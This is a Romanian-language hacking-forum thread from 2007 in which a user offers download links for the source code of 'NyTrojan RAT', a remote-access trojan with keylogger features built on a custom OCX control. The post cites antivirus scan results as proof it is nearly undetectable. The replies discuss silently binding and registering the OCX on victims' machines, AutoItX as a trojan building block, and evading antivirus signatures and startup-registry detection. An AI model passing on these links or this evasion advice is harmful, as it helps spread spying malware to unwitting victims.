Jump to content
Nytro

NyTrojan RAT Source Code 97% UD

Recommended Posts

Posted

Un trojan , care foloseste toate functiile NyTrojan.OCX

Deci folositi ocx : obtineti un trojan 97% UD , decat McAfee il gaseste , foarte usor de folosit functiile OCXului , faceti foarte usor Keylogger si multe altele .

Sursa ESTE EXPLICATA , cred ca veti intelege toti :)

Grafica e varza dar e nedetectabil : decat McAfee l-a gasit ca VB-BackDoor.a.gen .

Download Source Code ( e si OCX acolo ) :

http://rapidshare.com/files/80026164/NyTrojan_RAT_Source_Code.rar

http://www.speedyshare.com/611620807.html

http://www2.eushare.com/download.php?file=NyTrojan%20RAT%20Source%20Code.rar

http://www.netdrive.ws/40906.html

Screenshot :

nytrojansccq7.jpg

Server Scan :

File Server.exe received on 12.30.2007 10:13:07 (CET)

Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

Result: 1/32 (3.13%)

Client Scan :

File Client.exe received on 12.30.2007 10:17:04 (CET)

Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

Result: 1/32 (3.13%)

OCX Scan :

File NyTrOjan.ocx received on 12.30.2007 10:20:40 (CET)

Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

Result: 0/32 (0%)

Mai multe depre OCX :

http://rstcenter.com/forum/nytrojan-ocx-t9594.rst

Posted
OCX Scan

Preety smart ... ai scanat un OCX :)) ?

daca victima nu are ocx-u tau trojanul functioneaza?sau nu,,,?

Tu ce crezi ? Normal ca nu.

Cat despre asta, e cam timp pierdut. O sa imi sustin afirmatia maine - acum mi-e cam somn -, prin prezentarea unui DLL interesant ;).

Guest Nemessis
Posted

tw8, ocx-ul se poate binda si inregistra in sistem foarte usor. Atata timp cat functioneaza nu vad de ce ar fi timp pierdut degeaba.

Posted
tw8, ocx-ul se poate binda si inregistra in sistem foarte usor.

Stiu :P.

Atata timp cat functioneaza nu vad de ce ar fi timp pierdut degeaba.

AutoIT a scos o chestie destul de interesanta numita AutoITX. Are o gramada de functii interesante, concepute pentru automatizari si care pot fi folosite cu usurinta pentru a realiza in orice limbaj de programare lucruri cel putin dragute.

Numeroasele optiuni de lucru cu ferestrele il fac ideal pentru optiuni de fun pentru trojani.

In plus, are si un help solid si e foarte usor de implementat in limbajele .NET .

Cam atat cu vorba ca adorm pe tastatura.

Link de download pentru curiosi:

http://www.autoitscript.com/cgi-bin/countdown.pl?AutoIt/AutoItX.zip

Posted

Incerc sa copiez ocx in Form_initialize din fisier de resurse sa vad daca merge ... Si sunt sigur ca nu am muncit degeaba , 97 % nedetectabil ... de fapt nu vad de ce ar fi detectabil ... in cod nu gasesti decat NyTrojan1.OpenCDRom , NyTrojan1. ... etc ... deci trojanu propriu zis nu va fi detectabil , nu are cum , insa ocx , cred ca va fi detectabil ... si mai am o idee , pentru a face un trojan nedetectabil , dar o pastrez , pentru cand devine ocx detectabil...:)

Posted
insa ocx , cred ca va fi detectabil ... si mai am o idee , pentru a face un trojan nedetectabil , dar o pastrez , pentru cand devine ocx detectabil...:)

Tu auzi ce prostii debitezi ?

OCX detectabil ... yeah 8).

Posted

Pai , la nytro.ocx , versiunea mai veche , a scanat-o cineva si a gait-o AVG ... BackDoor Win32 ... nu mai stiu ... si o sa se prinda cei de la antivirui de smecheria asta cu ocx-ul ...

Posted
Tu auzi ce prostii debitezi ?

OCX detectabil ... yeah 8).

De fapt, un OCX poate fi detectat de AV. Pentru ca foloseste formatul PE (la fel ca si executabilele, DLLurile si alte fisiere cu alte extensii [.scr, .sys]). Spre exemplu, un fisier cu extensia .dat nu o sa fie niciodata detectat de AV, pentru ca nu foloseste file formatul de mai sus.

Posted

Nu numei PE ... si txt sunt gasite ... De ex. c99-le il aveam txt ... si a fost gasit ca virus ... daca intram pe coolpics ... site ala cu virusul de dadeai massuri pe mess , nu ma lasa kasperky sa intru ... Ar trebui ca antivirusii sa gaseasca si .vbs , .bat ... fiiere care pot face rau ... insa ocx meu , singur nu poate face nici un rau , decat daca un exe , ii foloseste functiile ...

Posted

Da Nytro, dar antivirusii scaneaza comparand cu baza lor de date si cand gasesc ceva similar, sar imediat avertizand ca fisierul este suspicios. Ocx-ul este "descopmpus" la analiza si .. atata timp cat exista vechile coduri, tot va sari, chiar daca includem ceva nou intre timp ;) Eu 1 am facut niste teste si ... partile la care trebuie lucrat sunt intrarile in registrii (startup), in primul rand.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...